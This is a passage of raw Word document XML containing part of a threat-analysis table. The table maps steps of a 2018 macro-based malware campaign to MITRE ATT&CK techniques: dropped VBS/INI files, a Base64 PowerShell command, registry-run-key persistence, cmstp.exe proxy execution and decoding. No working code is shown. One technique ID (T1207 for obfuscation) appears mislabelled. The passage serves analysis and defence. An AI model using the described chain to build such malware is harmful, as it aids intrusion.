            <w:r w:rsidRPr="00765632">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00527497" w:rsidRPr="00B857D7" w14:paraId="6434BBBD" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA60A1A" w14:textId="77777777" w:rsidR="00527497" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDE840D" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="0052749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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267CC343" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049125D">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>T1207 Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B5BA155" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2548F201" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A78C5B6" w14:textId="77777777" w:rsidR="00527497" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0645BD8C" w14:textId="484A30EB" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C856306" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002308C8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00765632">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The INI file contains the Base64 encoded PowerShell command</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> ….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00527497" w:rsidRPr="00B857D7" w14:paraId="7994FC11" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56132457" w14:textId="77777777" w:rsidR="00527497" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3765FFEA" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">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2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F177378" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AD37CF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B5BD07" w14:textId="10828DD8" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="542187BD" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25614177" w14:textId="77777777" w:rsidR="00527497" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F1949F9" w14:textId="61437392" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2837A3D5" w14:textId="77777777" w:rsidR="00527497" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00527497">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A0139C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="008135A8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>After dropping the three files, the macro will set the following registry key to achieve persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="20958CF6" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63970246" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="333F1910" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09"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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B1484B" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00FF3672" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E817DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1218.003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E817DB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>System Binary Proxy Execution: CMSTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A2F11AE" w14:textId="5FFE68AF" w:rsidR="00345E09" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AC60F09" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B3BA968" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ADECC3A" w14:textId="71D7BFBD" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="604DB7EB" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00E817DB" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:r w:rsidRPr="00FA6181">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="008135A8">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="7DCBD7CB" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="244D83FF" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CCDA42E" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09"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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08204AB0" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00FF3672" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59DDEA79" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31790810" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B371B11" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C161911" w14:textId="18CF12E1" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56CC7C5D" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00260243">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>….</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="08F351E2" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1022890D" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F06668" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">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910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C955D79" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00FF3672" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FF3672">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FF3672">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="092FE5EB" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D941EB3" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="066A6098" w14:textId="77777777" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A085719" w14:textId="0BFE383B" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
